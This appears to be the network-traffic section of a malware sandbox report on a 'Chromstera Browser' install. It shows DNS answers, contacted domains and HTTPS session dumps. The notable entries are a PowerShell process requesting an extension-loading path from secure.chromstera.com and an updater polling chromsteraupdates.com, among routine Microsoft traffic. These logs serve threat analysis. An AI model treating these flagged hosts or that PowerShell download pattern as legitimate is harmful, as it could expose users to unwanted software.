Oct 28, 2024 19:12:51.803967953 CET | 192.168.2.4 | 1.1.1.1 | 0x4d3d | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 28, 2024 19:11:31.047364950 CET | 1.1.1.1 | 192.168.2.4 | 0xf77 | No error (0) | chromsteraupdates.com | - | 104.21.8.139 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:11:31.047364950 CET | 1.1.1.1 | 192.168.2.4 | 0xf77 | No error (0) | chromsteraupdates.com | - | 172.67.139.132 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:11:31.068006039 CET | 1.1.1.1 | 192.168.2.4 | 0x5734 | No error (0) | secure.chromstera.com | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:11:31.068006039 CET | 1.1.1.1 | 192.168.2.4 | 0x5734 | No error (0) | secure.chromstera.com | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:46.632594109 CET | 1.1.1.1 | 192.168.2.4 | 0xe4cd | No error (0) | svc.ha-teams.office.com | mira-tmc.tm-4.office.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 28, 2024 19:12:48.152749062 CET | 1.1.1.1 | 192.168.2.4 | 0xa913 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 28, 2024 19:12:48.152749062 CET | 1.1.1.1 | 192.168.2.4 | 0xa913 | No error (0) | googlehosted.l.googleusercontent.com | - | 172.217.16.193 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:48.153633118 CET | 1.1.1.1 | 192.168.2.4 | 0xabb2 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 28, 2024 19:12:49.367346048 CET | 1.1.1.1 | 192.168.2.4 | 0x262e | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 28, 2024 19:12:49.367346048 CET | 1.1.1.1 | 192.168.2.4 | 0x262e | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.613410950 CET | 1.1.1.1 | 192.168.2.4 | 0xf48c | No error (0) | chrome.cloudflare-dns.com | - | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.613410950 CET | 1.1.1.1 | 192.168.2.4 | 0xf48c | No error (0) | chrome.cloudflare-dns.com | - | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.613573074 CET | 1.1.1.1 | 192.168.2.4 | 0xa8c4 | No error (0) | chrome.cloudflare-dns.com | - | - | 65 | IN (0x0001) | false
Oct 28, 2024 19:12:51.614186049 CET | 1.1.1.1 | 192.168.2.4 | 0x319f | No error (0) | chrome.cloudflare-dns.com | - | - | 65 | IN (0x0001) | false
Oct 28, 2024 19:12:51.614321947 CET | 1.1.1.1 | 192.168.2.4 | 0xdf7b | No error (0) | chrome.cloudflare-dns.com | - | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.614321947 CET | 1.1.1.1 | 192.168.2.4 | 0xdf7b | No error (0) | chrome.cloudflare-dns.com | - | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.808140993 CET | 1.1.1.1 | 192.168.2.4 | 0xe8d4 | No error (0) | chrome.cloudflare-dns.com | - | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.808140993 CET | 1.1.1.1 | 192.168.2.4 | 0xe8d4 | No error (0) | chrome.cloudflare-dns.com | - | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:12:51.811233044 CET | 1.1.1.1 | 192.168.2.4 | 0x4d3d | No error (0) | chrome.cloudflare-dns.com | - | - | 65 | IN (0x0001) | false
• secure.chromstera.com
• chromsteraupdates.com
• slscr.update.microsoft.com
• otelrules.azureedge.net
• clients2.googleusercontent.com
• edgeassetservice.azureedge.net
• chrome.cloudflare-dns.com
• msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 188.114.97.3 | 443 | 7964 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:11:31 UTC | 119 | OUT | GET /cross/crx3dynamic/?adv=426&v=4.4&time=1730139128 HTTP/1.1
Host: secure.chromstera.com
Connection: Keep-Alive
2024-10-28 18:11:32 UTC | 790 | IN | HTTP/1.1 404 Not Found
Date: Mon, 28 Oct 2024 18:11:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Referrer-Policy: no-referrer
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4g0jurbb%2FylK2vxdGNtVOvYJ6WuYmHIJDz157KP1iuDbj2hgY2dNAcVG1v85MCCMcU0hYATOIB9I3tzplk3I1Dg4PmrjZncSKwOyB6wlxUdmw34FPOLlgKRlbM8Xx1WKD%2BUSuEFMME%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d9ce38bffc5e96a-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=733&delivery_rate=1698533&cwnd=248&unsent_bytes=0&cid=2453cd3faa7abb50&ts=320&x=0"
2024-10-28 18:11:32 UTC | 348 | IN | Data Raw: 31 35 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e
Data Ascii: 155<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
2024-10-28 18:11:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 104.21.8.139 | 443 | 8100 | C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:11:31 UTC | 160 | OUT | GET /download/updates.txt HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: AdvancedInstaller
                                                                                                                                                                            Host: chromsteraupdates.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
2024-10-28 18:11:31 UTC | 880 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:11:31 GMT
                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            ETag: "2817279164"
                                                                                                                                                                            Last-Modified: Sun, 27 Oct 2024 22:02:50 GMT
                                                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bJqGMYy%2BWwErS7TlJr3rcsmq9ZxXVpeel0Um3azP8yC%2FLQ%2FD43c5Ot5mxdu8l8vqTRoIJ6baLxPyTRjGMcaANLAn8MGcioq5dwq1f409oWhc0ubQLaVW8ZbjdbRfbXCXDpfHVcNYaxs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8d9ce38bfbf8e867-DFW
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1454&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=774&delivery_rate=1991746&cwnd=251&unsent_bytes=0&cid=c9edb86717f60947&ts=271&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49736 | 4.245.163.56 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:11:38 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pUkVGK2e4kgEmE9&MD=mNzcmBgT HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                            Host: slscr.update.microsoft.com
2024-10-28 18:11:38 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Expires: -1
                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                            MS-CorrelationId: a60a63cc-d162-438d-b310-b266c16d60a2
                                                                                                                                                                            MS-RequestId: bb5620ba-5c49-48b6-a6c0-ac7faa0b229e
                                                                                                                                                                            MS-CV: BV2u2RkShUuM9exh.0
                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:11:38 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.4 | 49754 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:16 UTC | 195 | OUT | GET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:16 UTC | 561 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:16 GMT
                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                            Content-Length: 218853
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public
                                                                                                                                                                            Last-Modified: Sun, 27 Oct 2024 10:35:44 GMT
                                                                                                                                                                            ETag: "0x8DCF6731CF80310"
                                                                                                                                                                            x-ms-request-id: 89d6c6b8-201e-0033-2798-28b167000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181216Z-17fbfdc98bb9cv5m0pampz446s00000004sg00000000c8xv
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:16 UTC | 15823 | IN | Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-10-28 18:12:16 UTC | 16384 | IN | Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
2024-10-28 18:12:16 UTC | 16384 | IN | Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
2024-10-28 18:12:16 UTC | 16384 | IN | Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
2024-10-28 18:12:16 UTC | 16384 | IN | Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
2024-10-28 18:12:17 UTC | 16384 | IN | Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
2024-10-28 18:12:17 UTC | 16384 | IN | Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
2024-10-28 18:12:17 UTC | 16384 | IN | Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
2024-10-28 18:12:17 UTC | 16384 | IN | Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
2024-10-28 18:12:17 UTC | 16384 | IN | Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49755 | 4.245.163.56 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:17 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pUkVGK2e4kgEmE9&MD=mNzcmBgT HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                            Host: slscr.update.microsoft.com
2024-10-28 18:12:18 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Expires: -1
                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                            MS-CorrelationId: 999929c3-dd83-44dc-8676-012a1fb38e47
                                                                                                                                                                            MS-RequestId: d458b39e-0f0f-4f0c-934d-5b2c4dc6a5c7
                                                                                                                                                                            MS-CV: XjHqGozIH0WBazVv.0
                                                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:17 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Length: 30005
2024-10-28 18:12:18 UTC | 15824 | IN | Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-10-28 18:12:18 UTC | 14181 | IN | Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.4 | 49760 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:18 UTC | 192 | OUT | GET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:18 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                            x-ms-request-id: 7920d540-e01e-0085-1f11-29c311000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-17fbfdc98bb8lw78ye6qppf97g00000005yg000000002vgc
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:18 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
6 | 192.168.2.4 | 49758 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:18 UTC | 192 | OUT | GET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                            x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-17fbfdc98bb8mkvjfkt54wa538000000037g00000000fsnw
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:18 UTC | 2980 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


Session ID | Source IP | Source Port | Destination IP | Destination Port
7 | 192.168.2.4 | 49757 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:18 UTC | 192 | OUT | GET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:18 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                            x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-17fbfdc98bbfmg5wrf1ctcuuun00000005s000000000azck
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
2024-10-28 18:12:18 UTC | 450 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


Session ID | Source IP | Source Port | Destination IP | Destination Port
8 | 192.168.2.4 | 49759 | 13.107.253.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-10-28 18:12:18 UTC | 192 | OUT | GET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
2024-10-28 18:12:18 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                            x-ms-request-id: c4ab37c7-901e-002a-3417-267a27000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-17fbfdc98bbwmxz5amc6q625w000000001bg00000000bg1z
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:18 UTC | 2160 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            9 | 192.168.2.4 | 49756 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:18 UTC | 193 | OUT | GET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:18 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:18 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                            x-ms-request-id: 85f3058c-201e-00aa-6c2c-283928000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181218Z-r1755647c66tgwsmrrc4e69sk000000004pg0000000096er
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:18 UTC | 3788 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                            10 | 192.168.2.4 | 49765 | 13.107.253.45 | 443
                                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 192 | OUT | GET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:19 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                            x-ms-request-id: 1f7bc680-101e-0065-6904-274088000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181219Z-17fbfdc98bbwj6cp6df5812g4s0000000710000000000r27
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:19 UTC | 632 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
